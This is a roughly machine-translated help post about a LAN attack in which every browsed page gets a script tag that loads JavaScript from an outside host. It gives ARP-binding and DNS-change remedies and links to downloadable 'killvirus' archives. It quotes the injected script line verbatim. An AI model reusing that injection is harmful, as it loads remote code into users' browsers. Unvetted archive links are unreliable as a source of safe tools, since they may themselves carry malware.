Company LAN Access to All pages are added with <SCRIPT src = http://16a.us/2.js> </SCRIPT> Code,
This is all the web pages opened by the client. Therefore, it can be ruled out that the server environment has suffered ARP spoofing. based on the opinions of all parties on the Internet, the local gateway or DNS is hijacked and the fault is eliminated after the local connection is repaired.
The root solution is to bind the gateway MAC address:
Command Line input ARP-s gateway IP Gateway Mac
You can use the ARP command to query the MAC address of the gateway.
If the DNS is hijacked, change the DNS server.
Two articles on JS encryption and decryptionArticleAnd may be useful to anyone who wants to study the above virus script.
Http://bbs.blueidea.com/viewthread.php? Tid = 2665835 & page = 1 # pid2702392
Http://bbs.blueidea.com/viewthread.php? Tid = 2440360
16A. Us exclusive tool:
Http://free.ys168.com/infile/note/note_6.htm? Http://ys-H.ys168.com /? Killvirus.rar _ 72e7bspnnht1bkp0c0c0com1biu14z97f1o0bsjtpm4z
Http://hzyo.com/killvirus.rar